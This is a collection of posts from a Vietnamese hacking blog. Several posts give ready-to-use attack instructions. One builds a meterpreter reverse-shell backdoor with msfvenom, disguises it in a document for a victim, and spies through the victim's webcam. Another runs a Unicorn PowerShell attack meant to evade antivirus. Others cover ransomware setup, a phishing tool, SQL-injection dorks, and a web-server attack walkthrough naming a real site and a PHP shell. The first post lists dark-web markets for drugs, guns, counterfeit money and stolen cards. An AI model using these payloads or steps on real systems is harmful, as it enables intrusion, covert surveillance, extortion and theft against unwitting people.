0 50 Links Truy Cập DeepWeb [ 2017 ]

---

No Hacking No Life

---

Hẳn cụm từ " DeepWeb " đã không còn xa lạ đối với chúng ta rồi đúng không ? DeepWeb hay còn gọi là DarkNet dùng để nói những Website mà bạn không thể truy cập bằng các Trình duyệt thông thường như Cốc Cốc , FireFox , Google , Opera , UC ,.... mà chỉ có thể truy cập bằng Trình duyệt Tor  Hôm nay mình sẽ gửi đến các bạn 50 Links Truy cập DeepWeb còn sống nhé !

1. shotsat2dotfotbs.onion   - TorShop
2. tmskhzavkycdupbr.onion  - DreamMarket Forum
3. torlinkbgs6aabns.onion  - Tor Links
4. valhallaxmn3fydu.onion  - Valhalla Market
5. lchudifyeqm4ldjj.onion  -  Dream Market – Dark web market
6. silkkitiehdg5mug.onion - Silkkitie Market
7. jd6yhuwcivehvdt4.onion - Dream Market – Dark web market featuring
8. t3e6ly3uoif4zcw2.onion - Dream Market – Dark web market featuring
9. 7ep7acrkunzdcw3l.onion - Dream Market – Dark web market featuring
10. tt3j2x4k5ycaa5zt.onion - Upload / Download File ( Hosting )
11. hdwikicorldcisiy.onion - Hidden Wiki
12. grams7enufi7jmdl.onion - Grams ( Chưa hiểu rõ mục đích )
13. deepdot35wvmeyd5.onion - DeepDotWeb – Surfacing the News
14. dirnxxdraygbifgc.onion - OnionDir – Deep Web Link Directory
15. n2ha26oplph454e6.onion - Welcome To A New Site
16. rbaco5flcou46wpd.onion - Welcome To Dark Web Links & More!
17. radiocbsi2q27tob.onion - R´adio CBS – Comunica¸c˜oes Brasileira de S
18. lwplxqzvmgu43uff.onion - Runion – Russian Forum
19. hansamkt2rr6nfg3.onion - HANSA Market
20. wallstyizjhkrvmj.onion - Wall Street Market
21. http://w363zoq3ylux5rf5.onion - Galaxy2 Social network
( Cân nhắc trước khi truy cập , mới gần đây nhiều bài viết của 1 thanh niên đang rất nhiều ảnh Khiêu dâm , giết người và thuốc lắc )
22. kpynyvym6xqi7wz2.onion - main.paraZite # Anarchy files and Underground
23. bankshopiweol3mv.onion - Store
24. zqktlwi4fecvo6ri.onion  - The Hidden Wiki – Outdated, full of scam
25. chattorci7bcgygp.onion - ChatTor ( 100% ẩn danh )
26. xmh57jrzrnw6insl.onion - TORCH: Tor Search Engine
27. slpwlkryjujyjhct.onion  - SleepWalker
28. cocaineo5z66elwy.onion -  Concerned Cocaine Citizens
29. torvps7kzis5ujfz.onion - TorVPS
30. wikitorcwogtsifs.onion - The Hidden Wiki
31. ntcixulmms4275vi.onion - Hidden Wiki – Outdated and filled with scam
32. mystorew25hgytln.onion - Store
33. fantomwf4luxar7u.onion - Fantom urls – Forum for paranoids
34. xfnwyig7olypdq5r.onion - USA Citizenship
35. vfqnd6mieccqyiit.onion - UK Passports
36. deeplinkdeatbml7.onion DeepLink
37. abbujjh5vqtq77wg.onion Onion Identity
38. 54ogum7gwxhtgiya.onion Krang Hidden Base in Tor. Technodrome. B
39. costeirazb2xecgs.onion costeira.i2p.onion – Servidor de download
40. allyour4nert7pkh.onion AYB – ur mum XDDDDDDD
41.linkskgiymtyszdb.onion LINKS Onion Web Link Directory – Your co
42. skunksworkedp2cg.onion A portal containing lists of links autom
43. tfwdi3izigxllure.onion Apples 4 Bitcoin
44. fdwocbsnity6vzwd.onion French Deep Web
45. roothitpesjylrta.onion PT-BR: Site oficial do roothit EN-US: We
46. tuu66yxvrnn3of7l.onion UK Guns and Ammo Store
47. 3dbr5t4pygahedms.onion ccpal – ccs – cvv2s – paypal
48. y3fpieiezy2sin4a.onion HQER – High Quality Euro Counterfeits
49. http://buddsz76bq3tmueu.onion/ BubShop
50. http://cvalleyeo5lm7gyr.onion/ CardValley

0 McAfee RootKit Remover | Công cụ loại bỏ RootKit và Các phần mềm độc hại.

---

No Hacking No Life

---

Ở bài trước tôi cũng đã giới thiệu đến mọi người một công cụ của McAfee mang tên " McAfee FileInsight " thì hôm nay tôi lại tiếp tục mang đến cho mọi người một công cụ tên " McAfee RootkitRemover " .


            

Giới thiệu sơ qua về McAfee RootKit Remover này . Đây là một công cụ độc lập nhằm mục đích phát hiện và loại bỏ RootKit và các phần mềm độc hại trên máy tính của bạn. Hiện tại McAfee RootKit Remover có thể loại bỏ RootKit của ZeroAccess , Necurs và TDSS .

Hướng dẫn sử dụng : Để sử dụng công cụ này các bạn Download tại Links dưới đây ( Không có phần mềm độc hại )
Download : https://drive.google.com/open?id=0B0I11tm-lR54Vkl0OHZTQXNXbTg

Cách sử dụng . Rất đơn giản , sau khi tải về các bạn chỉ việc mở nên mà không cần cài đặt gì cả. Nếu không có Mã độc thì như hình trên , nếu có thì RootKitRemover sẽ thông báo và loại bỏ.

Cảm ơn các bạn đã theo dõi bài viết.

0 McAfee FileInsight | Công cụ Phân tích Website và Tệp tin.

---

No Hacking No Life

---

FileInsight được phát triển bởi McAfee , là một công cụ thích hợp cho việc Phân tích Website và các Tệp tin. Các tính năng chỉnh sửa và phân tích có săn của McAfee FileInsight có thể dễ dàng mở rộng thông qua các Plugins trên Python.

Download FileInsight :  https://drive.google.com/open?id=0B0I11tm-lR54RGdjWVNQUGJGZ3M

Cài đặt công cụ .
Sau khi Download công cụ từ Links mà tôi cung cấp các bạn sẽ tải về File có tên " FileInsight.zip "

Các bạn giải nén File này ra , và mở " fileinsight.exe " để bắt đầu cài đặt.

Về phần quá trình cài đặt thì cũng giống như bao chương trình khác. 

Đây là giao diện sau khi chúng ta đã cài xong .... 

Như vậy tôi đã giới thiệu xong tới mọi người công cụ McAfee FileInsight , và cách sử dụng cũng như một vài kỹ thuật liên quan tới McAfee FileInsight tôi sẽ cập nhật sớm nhất có thể . Xin cảm ơn !!

0 Cách Kiếm Bitcoin miễn phí chỉ với 1 chiếc máy tính cũ.

---

No Hacking No Life

---

Xin chào cả nhà , hôm nay tôi sẽ hướng dẫn mọi người cách kiếm Bitcoin Miễn Phí chỉ từ 1 chiếc máy tính cũ . Bạn nghĩ sao : " Một chiếc máy tính cũ mà lại có thể làm được điều này ư ? Thật lừa đảo ! " - Tuy nhiên đó lại là sự thật ..
Bitcoin là gì ?
https://sohoa.vnexpress.net/tin-tuc/doi-song-so/tien-ao-bitcoin-la-gi-3635439.html
( Nếu bạn chưa biết về Bitcoin xin hãy dành chút ít thời gian để đọc qua nó )

Bây giờ chúng ta cùng đi kiếm Bitcoin thôi nào !!!
Đầu tiên bạn truy cập vào : Storj
( Các bạn xin hãy yên tâm nhé ! Không lừa đảo , không mã độc , không Khiêu dâm ,.... )

Sau khi truy cập các bạn Nhấn vào " Rent Your Drive " và Click vào " Download "

Hoặc truy cập vào Links sau : https://github.com/Storj/storjshare-gui/releases/

( Links Download )

Bước tiếp theo các bạn vào đăng kí một tài khoản tại Counter Wallet : https://counterwallet.io/

( Các bạn xin hãy yên tâm nhé ! Không lừa đảo , không mã độc , không Khiêu dâm ,.... )

Tiếp đó Click vào :

Hoặc truy cập vào Links sau : https://wallet.counterwallet.io/

( Ghi rõ cho anh em đỡ nghi là Website Khiêu dâm )

Tiếp tục Click " Create Wallet " 

Tại đây một của sổ sẽ hiện ra cùng với một đoạn văn bản , các bạn Coppy + Paste và Notepad hay gì cũng được . Và ấn " I have ..... " rồi " Continua " 

Tiếp đó ấn " Skip This Step " >> Oke

Sau khi ấn Oke , bạn sẽ sử dụng Đoạn mã vừa lưu vào Notepad Coppy vô TextBox ( Gọi tạm vậy ) và ấn Login . 

Ấn Login xong bạn sẽ được đưa đến Trang mới ( Account )

Coppy Address cạnh dòng " My Address #1 " 

Bây giờ bạn mở File đã Download ở trên và Coppy Address vô mục 

" Payout Address " 

>> Lựa chọn các kiểu ( Phần này khá đơn giản nên mình sẽ không nói tới )

Lựa chọn các kiểu xong các bạn ấn " START " 

( Sau khi ấn các bạn ngồi uống cốc nước là vừa )

Tiếp tục ấn Storj Share Running 

Vậy coi như xong , đào được bao nhiêu nó sẽ chuyển vô cái tài khoản mà bạn đã đăng kí lúc nãy.

Cảm ơn đã theo dõi bài viết !!

1 Hướng dẫn Hack Webcam từ xa trên Kali Linux

---

No Hacking No Life

---

Chắc hẳn đã có rất nhiều bạn trong số chúng ta đã vài lần Search trên Google " How to hack webcam " và rồi nhận được kết quả như sau :
Xem tại đây.
Hay đã đọc qua các bài viết về Google Dork Hack Webcam rồi đúng không ? Nhưng hôm nay , tôi sẽ hướng dẫn mọi người Hack WebCam từ xa sử dụng Kali Linux.
Về phần chuẩn bị , các bạn chuẩn bị cho mình một chiếc PC có cài sẵn HĐH Kali Linux trên VMWare ( Download ) hoặc cài bằng DuaBoot .
Về phần thực hành mong các bạn thực hiện đúng các quy trình sau đây :
Bước 1 : Khởi động Terminal
Bước 2 : Sử dụng câu lệnh : " ipconfig " và coppy Ip vào Notepad hay bất cứ công cụ soạn nào mà bạn thích
Bước 3 : Mở một trang Ternimal mới và sử dụng câu lệnh " msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP]  LPORT=4444 -f exe > nohackingnolife.exe"
Mục đích của LHOST và LPORT = : Thiết lập LHOST và LPORT.
Vd : IP mà tôi thu được từ bước 1 là 192.168.1.3 thì câu lệnh ở bước 2 sẽ là
" msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f exe > topicsup.exe "

Nhấn " Enter " và chờ 1-3 giây đối với máy khỏe
Mục đích : Ở câu lệnh này bạn đã tạo một backdoor tên : nohackingnolife.exe
Sau khi backdoor được tạo xong bạn gửi qua cho victim.

Tiếp tục tại cửa sổ Terminal ban nãy bạn nhập lần lượt các lệnh :
" msfconsole "  : Khởi động Metasploit Farmework
( Nhấn Enter và chờ vài giấy )
" use multi/handler "

" set payload windows/meterpreter/reverse_tcp
(  Payload là gì ?  )

" set lhost [IP] "
Ví dụ : set lhost 192.168.1.3

" set lport 4444 "

" exploit "
( Nhấn Enter và chờ vài giây - )

Ngoài ra bạn có thể sử dụng câu lệnh " help " để xem các câu lệnh .
Ví dụ tại mục Help có danh sách câu lệnh như sau :s bạn

Để truy cập WebCam thông qua Backdoor lúc nãy ( yêu cầu Victim cần phải mở ) bạn sủ dụng lệnh 

" webcam_snap " 

Ngay sau đó bạn sẽ thấy được Webcam và bạn có thể nhìn trộm họ thay đồ ( Hihi ! )

Để tránh bị nghi ngờ bạn nên gắn backdoor đó vào 1 File tài liệu nào đó để Victim tránh sự nghi ngờ khi mở lên.

Cảm ơn các bạn đã theo dõi bài viết !

0 Một số Website Scan Website Security Online

---

No Hacking No Life

---

Đối với một số bạn làm các website thì điều không tránh khỏi là những lỗ hổng như : XSS , SQL Injection , CSRF ,.... Và để thực hiện việc Scan thì nhiều bạn sẽ nghĩ đến ngay các công cụ như : Acunetix , Nikto , Wikto , Burpsuite ,... thì hôm nay chúng ta sẽ không sử dụng những công cụ đó nữa mà thay vào là những Website Scan Online.
Sau đây là danh sách 10 trang Scan Website Scurity Online mà Admin biết đến và hay sử dụng :

- Đứng đầu bảng là Website " Scan My Server "
Truy cập : https://www.scanmyserver.com/
Trang này với giao diện dễ dùng , miễn phí và rất uy tín. Chỉ với 3 bước :
   1. Nhập URL
   2. Nhập email
   3. Xác nhận
Là bạn có thể Scan Online được rồi

- Thứ hai là Website " SSL Server Test "
Truy cập : https://www.ssllabs.com/ssltest/
Trang này giao diện cũng dễ  dùng với những bạn chưa hề đụng đến An ninh mạng , bảo mật . Chính vì vậy hãy thử nó.

( Từ các Website Hạng 3 trở xuống mình sẽ không giới thiệu nhiều )
- Quttera
Truy cập : http://www.quttera.com/
- Detectify
Truy cập : https://detectify.com/
- Site Guarding
Truy cập : https://www.siteguarding.com
( Website này cho dùng thử 14 ngày )
- Web Inspector
Truy cập : https://app.webinspector.com/
- Asafa Web
Truy cập : https://asafaweb.com/
- Netspacker Cloud
Truy cập : https://www.netsparker.com/online-web-application-security-scanner/
- UpGuard
Truy cập : https://app.upguard.com/webscan
- Tinfoli Security
Truy cập : https://www.tinfoilsecurity.com/

Cảm ơn các bạn đã theo dõi bài viết !!!

1 Ghost Phisher - Công cụ Phising << 2017 >>

---

No Hacking No Life

---

Ghost Phisher là một công cụ kiểm tra và tấn công lừa đảo không dây được viết bằng ngôn ngữ lập trình Python và thư viện Python QT Gui . Chương trình có thể bắc chước các điểm truy cập và triển khai.

Một số tính năng của Ghost Phisher :

1. Máy chủ HTTP

2. Máy chủ DNS  Inbuilt RFC 1035

3. Máy chủ DNS Inbuilt RFC 2131

4. Phishing

5. Cướp phiên

6. MITM và DOS Attack

7. Thâm nhập bằng công cụ Metasploit Blinding

8. Đăng nhập chứng chỉ tự động bằng cách sử dụng cơ sở dữ liệu SQlite

9. Cập nhật hỗ trợ.

Đọc thêm từ tác giả : http://shink.in/X6p0z

Download : http:/shink.in/xOoS1

File đã được quét và thu về kết quả rất an toàn như trong hình .

ì?

Cảm ơn đã theo dõi bài viết !!!!

0 Google Dork : Danh sách Google Dork SQL Injection 2017.

---

No Hacking No Life

---

about.php?cartID=

accinfo.php?cartId=

acclogin.php?cartID=

add.php?bookid=

add_cart.php?num=

addcart.php?

addItem.php

add-to-cart.php?ID=

addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID

help.php?CartId=

productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=

<< Xem thêm >>

Chúc các bạn thành công !

0 Unicorn - Tấn công PowerShell - Chống lại chương trình Anti Virus

---

No Hacking No Life

---

Unicorn.

Unicorn là gì?

Unicorn là một công cụ đơn giản được sử dụng cho một cuộc tấn công PowerShell và Tiêm ShellCode thẳng vào bộ nhớ.

Để bắt đầu, chúng ta cần phải tải Unicorn bằng cách truy cập vào links sau :

(Đây là công cụ 1 anh nước ngoài , hiện mình chỉ dịch 1 vài chỗ chứ chưa phải hoàn toàn nên hiện xin cứ dùng bản Việt Hóa tạm thời ạ)

Links download : http://shink.in/nk1uc

Tiếp theo , bạn mở terminal và khởi động metasploit lên:
[[mcode]]# service postgresql start
# msfconsole[[ecode]]

Kết quả như hình.

Giao diện msfconsole.

Tiếp theo chúng ta cần bật một ứng dụng lắng nghe của msf:

[[mcode]]msf > use exploit/multi/handler[[ecode]]

Chọn exploit là handler.

Sử dụng payload meterpreter, bạn có thể tìm hiểu thêm về payload meterpreter:
[[mcode]]msf exploit(handler) > set payload windows/meterpreter/reverse_tcp[[ecode]]

Chọn payload là meterpreter.

Bây giờ chúng ta cần thiết lập LHOST của chúng ta, tức là địa chỉ ip của máy attacker:
[[mcode]]msf exploit(handler) > set lhost 192.168.43.49[[ecode]]

Đặt listen host.

Tiếp theo là listen port:
[[mcode]]msf exploit(handler) > set lport 443[[ecode]]

Đặt listen port.

Bắt đầu cho chạy handler:
[[mcode]]msf exploit(handler) > exploit[[ecode]]

Chạy exploit handler.

Như vậy coi như bạn đã xong , giờ chúng ta chỉ cần gửi cho victim file được chọn làm mục tiêu bằng cách dán lệnh powershell_attacks.txt trong cửa sổ nhắc lệnh bất kỳ.

Mình sẽ đổi tên powershell_attack.bat và thực hiện chạy nó trên máy mục tiêu.

Và đây là ở máy của Attacker :

Đã bắt được cá~

Ví dụ để sẽ chụp màn hình từ webcam mục tiêu:
[[mcode]]meterpreter > webcam_snap[[ecode]]

Video demo từ tác giả:

Chúc cả nhà thành công !

0 GonnaCry – Linux Ransomware: Mã hóa tất cả File

---

No Hacking No Life

---

Ransomware?

Vâng nhắc đến Ransomeware thì chắc hẳn các bạn sẽ không cảm thấy xa lạ vì mới gần đây thôi đã có một vụ liên quan tới Wanna Cry (Ransomeware). Wanna Cry là gì? . Vậy bạn nghĩ sao về Gonna Cry - Linux Ransomeware? Hãy cùng chúng tôi khám phá nhé. (Có cách cài đặt đấy 👇)

Tải về từ Github:

Đầu tiên các bạn cần tải về thông qua lệnh :
[[mcode]]$ git clone https://github.com/tarcisio-marinho/GonnaCry.git[[ecode]]
[[mcode]]$ cd GonnaCry[[ecode]]
[[mcode]]$ sudo pip install -r requeriments.txt[[ecode]]

Bước tiếp theo là Chạy thử.

Kiểm tra không ảnh hưởng đến máy tính của bạn.
Kiểm tra các tập tin sau khi chạy thử được lưu trữ trong [[scode]]GonnaCry/tests/teste[[escode]].

Để mã hóa các bạn sử dụng lệnh :
[[mcode]]$ cd GonnaCry/tests [[ecode]]
[[mcode]]$ python criptografa.py [[ecode]]

Bạn thấy rằng các tập tin gốc đã được thay thế .
Để giải mã hóa thì chúng ta sử dụng lệnh :

[[mcode]]$ python decriptografa.py[[ecode]]

Những mục tiêu của GonnaCry:

1. Mã hóa tất cả các tệp bằng AES-256-CBC. 
2. Mã hóa các thiết bị ngoại vi: USB flash drives. 
3. Tạo ngẫu nhiên các phím AES cho mỗi lần bị nhiễm. 
4. Nó hoạt động thậm chí không có thiết bị bị nhiễm có giao tiếp với Internet. 
5. Giao tiếp với máy chủ yêu cầu khóa riêng. 
6. Mã hóa khóa AES với RSA-1024. 
7. Mã hóa khóa cá nhân với RSA-1024 từ máy chủ. 
8. Trao đổi hình nền máy tính. 
9. Destroy các tập tin gốc mà không có khả năng phục hồi. 
10. Hoàn thành chương trình. 

Cảm ơn các bạn đã theo dõi bài viết !

1 Ngăn chặn tấn công Man-In-The-Middle, giả mạo ARP bằng shARP

---

No Hacking No Life

---

shARP

ARP là gì?

Address Resolution Protocol là một giao thức truyền thông được sử dụng rộng rãi để tìm ra các địa chỉ tầng liên kết dữ liệu từ các địa chỉ tầng mạng.
Khi một gói tin được gửi từ một máy đến máy khác trong mạng cục bộ, địa chỉ IP đích phải được giải quyết thành địa chỉ MAC để truyền qua tầng liên kết dữ liệu. Khi biết được địa chỉ IP của máy đích, và địa chỉ MAC của nó cần truy cập, một gói tin broadcast được gửi đi trên mạng nội bộ. Gói này được gọi là ARP request. Máy đích với IP trong ARP request sẽ trả lời với ARP reply, nó chứa địa chỉ MAC cho IP đó.
ARP là một giao thức phi trạng thái. Máy chủ mạng sẽ tự động lưu trữ bất kỳ ARP reply nào mà chúng nhận được, bất kể máy khác có yêu cầu hay không. Ngay cả các mục ARP chưa hết hạn sẽ bị ghi đè khi nhận được gói tin ARP reply mới. Không có phương pháp nào trong giao thức ARP mà giúp một máy có thể xác nhận máy mà từ đó gói tin bắt nguồn. Hành vi này là lỗ hổng cho phép ARP spoofing xảy ra.

Còn ARP spoofing là gì?

Lợi dụng tính phi trạng thái đó, các phương thức ARP spoofing, ARP cache poisoning, hay ARP poison routing, là một kỹ thuật qua đó kẻ tấn công giả thông điệp ARP trong mạng cục bộ. Nói chung, attacker sẽ giả mạo địa chỉ MAC với địa chỉ IP của máy chủ khác, chẳng hạn như cổng mặc định (default gateway), làm cho bất kỳ gói tin nào được gửi tới IP đó được gửi đến kẻ tấn công thay vì đến gateway.

ARP spoofing có thể cho phép kẻ tấn công chặn các gói tin trên mạng, sửa đổi lưu lượng, hoặc dừng tất cả lưu lượng. Thông thường cuộc tấn công này được sử dụng như là một sự mở đầu cho các cuộc tấn công khác, chẳng hạn như tấn công từ chối dịch vụ, tấn công Man-in-the-middle attack, hoặc các cuộc tấn công cướp liên lạc dữ liệu.

Về chương trình ShARP:

Hôm nay ta sẽ tìm hiểu cách ngăn chặn ARP-spoofing này, giúp chúng ta ngăn chặn các cuộc tấn công như các cuộc tấn công MiTM (Man-in-the-middle) chúng ta sẽ sử dụng một script được gọi là shARP là một ứng dụng giả mạo ARP và chống ARP attack. Phần mềm sử dụng phương pháp quét chủ động để phát hiện và loại bỏ bất kỳ ARP-spoofer từ mạng. Chương trình giả mạo chống ARP này, phát hiện sự có mặt của một bên thứ ba trong mạng riêng.

• Tác giả: europa502
• Trang dự án: https://github.com/europa502/shARP

Nó có 2 chế độ: phòng thủ và tấn công.

1. Phòng thủ.

Là chế độ bảo vệ người dùng cuối từ spoofer bởi ngắt kết nối hệ thống của người dùng từ mạng và cảnh báo cho người dùng bằng tin nhắn âm thanh càng sớm càng giả mạo được phát hiện.

2. Tấn công.

Là chế độ ngắt kết nối hệ thống của người dùng khỏi mạng và tiếp tục tấn công bằng cách gửi các gói tin xác thực đến hệ thống của anh ta, không phải anh ta kết nối lại vào mạng cho đến khi chương trình được đặt lại bằng tay.

Hướng dẫn sử dụng shARP:

Bây giờ chúng ta biết những gì shARP hiện chúng ta có thể sử dụng nó để bảo vệ hệ thống của chúng tôi từ APR-Spoofing.
Đầu tiên chúng ta cần tải về shARP bằng git:
[[mcode]]$ git clone https://github.com/europa502/shARP.git[[ecode]]
Trước tiên, hãy điều hướng đến thư mục tải xuống cho shARP:
[[mcode]]$ cd shARP[[ecode]]
Tiếp theo chúng ta cần làm là phân quyền lại để có thể chạy được script này:
[[mcode]]$ chmod +x shARP.sh[[ecode]]

Các tập tin và thư mục sau khi tải về.

Bây giờ chúng ta có thể chạy shARP bằng các chạy trực tiếp file script.
Cú pháp lệnh: [[scode]]$ ./shARP.sh [options] [interface][[escode]]
Các tùy chọn [[scode]]options[[escode]]:
[[scode]]-r[[escode]]: Restart lại card mạng và driver.
[[scode]]-d[[escode]]: Chạy với chế độ phòng thủ (defense).
[[scode]]-o[[escode]]: Chạy với chế độ tấn công (offense).
[[scode]]-h[[escode]]: Hiển thị bản trợ giúp (help).

Sau đây là một số ví dụ.

Để thiết lập lại card mạng và trình điều khiển:

[[mcode]]./shARP.sh -r wlan0[[ecode]]

Để kích hoạt chương trình trong chế độ bảo vệ:

Chế độ bảo vệ bảo vệ người dùng cuối khỏi spoofer bằng cách ngắt kết nối hệ thống của người dùng khỏi mạng. Chế độ này cũng cảnh báo người dùng bằng một tin nhắn âm thanh ngay khi phát hiện được giả mạo.
[[mcode]]./shARP.sh -d wlan0[[ecode]]

Chạy với chế độ phòng thủ.

Để kích hoạt chương trình trong chế độ tấn công:

Chế độ tấn công ngắt kết nối hệ thống của người dùng khỏi mạng và tiếp tục tấn công bằng cách gửi các gói tin De-authentication đến hệ thống mang, điều này sẽ không cho phép người dunkết nối lại vào mạng cho đến khi chương trình được đặt lại bằng tay.
[[mcode]]./shARP.sh -o wlan0[[ecode]]

Chạy với chế độ tấn công.

Chương trình tạo một tệp nhật ký (log file) trong thư mục [[scode]]/usr/shARP/[[escode]] chứa các chi tiết của cuộc tấn công như địa chỉ MAC người tấn công, nhà cung cấp MAC, thời gian và ngày của cuộc tấn công. Từ đây ta có thể truy ra được

Cảm ơn các bạn đã theo dõi bài viết.

3 Kỹ thuật Hack Web Server.

---

No Hacking No Life

---

Khách hàng thường truy cập Internet để lấy thông tin và mua sản phẩm và dịch vụ.Hầu hết các trang web lưu trữ thông tin có giá trị như số thẻ tín dụng, địa chỉ email và mật khẩu,... Điều này chính là mục tiêu bị nhắm đến bởi các Hacker Mũ Đen hay các Hacker Mũ Xám làm việc cho một ai đó (một tổ chức nào đó). Trang web bị đánh lừa cũng có thể được sử dụng để truyền đạt ý tưởng tôn giáo hoặc chính trị,... vv

Trong bài này, chúng tôi sẽ giới thiệu cho bạn các kỹ thuật Hack một Web Server và cách bạn có thể bảo vệ máy chủ khỏi các cuộc tấn công như vậy.

Lỗ hổng máy chủ Web.

Máy chủ web là một chương trình lưu các tệp tin (thường là các trang web) và giúp chúng có thể truy cập qua mạng hoặc internet . Một máy chủ web yêu cầu cả phần cứng và phần mềm. Những kẻ tấn công thường nhắm mục tiêu khai thác trong phần mềm để có được quyền truy cập vào máy chủ. Hãy nhìn vào một số lỗ hổng phổ biến mà kẻ tấn công tận dụng.

• Cài đặt mặc định - Những cài đặt này như ID và mật khẩu người dùng mặc định có thể dễ dàng đoán ra bởi những kẻ tấn công. Cài đặt mặc định cũng có thể cho phép thực hiện các tác vụ nhất định như chạy các lệnh trên máy chủ có thể bị khai thác. 
• Việc cấu hình sai hệ điều hành và mạng - cấu hình nhất định như cho phép người dùng thực thi các lệnh trên máy chủ có thể nguy hiểm nếu người dùng không có mật khẩu tốt. 
• Các lỗi trong hệ điều hành và máy chủ web - phát hiện lỗi trong hệ điều hành hoặc phần mềm máy chủ web cũng có thể được khai thác để truy cập trái phép vào hệ thống. 

Các loại Web Server.

Sau đây là danh sách các máy chủ web phổ biến:

• Apache - Đây là máy chủ web thường được sử dụng trên internet. Đây là nền tảng chéo nhưng nó thường được cài đặt trên Linux. Hầu hết các trang web PHP được lưu trữ trên máy chủ Apache. 
• Internet Information Services (IIS) - Nó được phát triển bởi Microsoft. Và chạy trên Windows ,  là máy chủ web được sử dụng nhiều thứ hai trên internet. Hầu hết các trang asp và aspx được lưu trữ trên các máy chủ IIS. 
• Apache Tomcat - Hầu hết các trang máy chủ Java (JSP) được lưu trữ trên loại máy chủ web này. 
• Các máy chủ web khác - bao gồm máy chủ Web của Novell và các máy chủ Lotus Domino của IBM. 

Các loại tấn công Web Server.

Tấn công Directory Traversal:

l - Đây là loại tấn công khai thác lỗi trong máy chủ web để truy cập trái phép vào các tập tin và thư mục mà không phải là trong lĩnh vực công cộng. Khi kẻ tấn công đã có quyền truy cập, họ có thể tải xuống thông tin nhạy cảm, thực hiện các lệnh trên máy chủ hoặc cài đặt phần mềm độc hại.

Tấn công từ chối dịch vụ:

2 - Với loại tấn công này, máy chủ web có thể sụp đổ hoặc trở nên không có sẵn cho người dùng hợp pháp
.

Hệ thống Tên miền Hijacking:

Với loại kẻ tấn công này, cài đặt DNS được thay đổi để trỏ đến máy chủ web của kẻ tấn công. Tất cả lưu lượng được cho là được gửi đến máy chủ web được chuyển hướng đến một trong những sai.
Sniffing - Dữ liệu không được mã hóa gửi qua mạng có thể bị chặn và sử dụng để truy cập trái phép vào máy chủ web.

Lừa đảo:

Với loại tấn công này, cuộc tấn công giả mạo các trang web và hướng lưu lượng tới trang web giả mạo. Người dùng không nghi ngờ có thể bị lừa khi gửi dữ liệu nhạy cảm như chi tiết đăng nhập, số thẻ tín dụng, v.v.
Pharming - Với loại tấn công này, kẻ tấn công thỏa hiệp các máy chủ Hệ thống Tên miền (DNS) hoặc trên máy tính người dùng để lưu lượng truy cập vào một trang web độc hại.

Xóa dữ liệu:

Với loại tấn công này, kẻ tấn công sẽ thay thế trang web của tổ chức bằng một trang khác có chứa tên, hình ảnh của hacker và có thể bao gồm nhạc nền và tin nhắn.

Ảnh hưởng của cuộc tấn công.

• Danh tiếng của một tổ chức có thể bị hủy hoại nếu kẻ tấn công chỉnh sửa nội dung trang web và bao gồm thông tin độc hại hoặc liên kết tới trang web khiêu dâm 
• Máy chủ web có thể được sử dụng để cài đặt phần mềm độc hại vào người dùng truy cập trang web bị xâm nhập . Phần mềm độc hại được tải xuống máy tính của khách truy cập có thể là một loại virus, Trojan hoặc Botnet Software, v.v. 
• Dữ liệu người dùng bị xâm phạm có thể được sử dụng cho các hoạt động gian lận có thể dẫn đến sự mất mát kinh doanh hoặc kiện tụng từ những người dùng ủy thác chi tiết của họ với tổ chức 

Một số công cụ.

Một số công cụ tấn công máy chủ web phổ biến bao gồm;

• Metasploit - đây là công cụ mã nguồn mở để phát triển, thử nghiệm và sử dụng mã khai thác. Nó có thể được sử dụng để phát hiện các lỗ hổng trong các máy chủ web và viết khai thác có thể được sử dụng để thỏa hiệp với máy chủ. 
• MPack - đây là một công cụ khai thác web. Nó được viết bằng PHP và được hỗ trợ bởi MySQL . Khi một máy chủ web đã bị xâm nhập bằng cách sử dụng MPack, tất cả lưu lượng truy cập tới nó sẽ được chuyển hướng đến các trang web tải xuống độc hại. 
• Zeus - công cụ này có thể được sử dụng để biến một máy tính bị xâm nhập thành một bot hoặc zombie. Một bot là một máy tính bị xâm nhập được sử dụng để thực hiện các cuộc tấn công dựa trên internet. Một botnet là một tập hợp các máy tính bị xâm nhập. Botnet sau đó có thể được sử dụng trong một cuộc tấn công từ chối dịch vụ hoặc gửi thư rác. 
• Neosplit - công cụ này có thể được sử dụng để cài đặt chương trình, xóa các chương trình, sao chép nó, v.v ... 

Bắt đầu Hack Web Server.

Những gì chúng ta cần:

• Mục tiêu anonyviet.com
• Công cụ tìm kiếm Bing.
• Công cụ SQL Injection.
• PHP Shell, chúng ta sẽ sử dụng dk shell : http://shink.in/SH72D

Thu thập thông tin:

Chúng ta sẽ cần lấy địa chỉ IP của mục tiêu của chúng tôi và tìm các trang web khác có cùng địa chỉ IP. Mình sẽ sử dụng một công cụ trực tuyến để tìm địa chỉ IP của các mục đích và các trang web khác chia sẻ địa chỉ IP.
Nhập URL http://www.yougetsignal.com/tools/web-sites-on-web-server/ trong trình duyệt web của bạn.
Nhập "anonyviet.com" làm mục tiêu.


Nhấp vào nút Kiểm tra.
Bạn sẽ nhận được kết quả sau:



Dựa trên các kết quả trên, địa chỉ IP của mục tiêu là : 104.27.160.18

(Bạn cần phải tìm 403 trên cùng một máy chủ Web tại website được chỉ thị làm mục tiêu.)

Bước tiếp theo của chúng ta là quét các trang web khác cho lỗ hổng SQL injection. Lưu ý: nếu chúng ta có thể tìm thấy một lỗ hỏng SQL trên mục tiêu, sau đó chúng ta sẽ trực tiếp khai thác nó mà không cần xem xét các trang web khác.
Nhập URL www.bing.com vào trình duyệt web của bạn. Điều này sẽ chỉ làm việc với Bing vì vậy không sử dụng các công cụ tìm kiếm khác như google hoặc yahoo.
Nhập truy vấn tìm kiếm sau :
[[mcode]]ip:104.27.160.18 .php?id=[[ecode]]
Như bạn thấy từ các kết quả trên, tất cả các trang web sử dụng các biến GET như là các tham số cho việc chèn SQL đã được liệt kê.
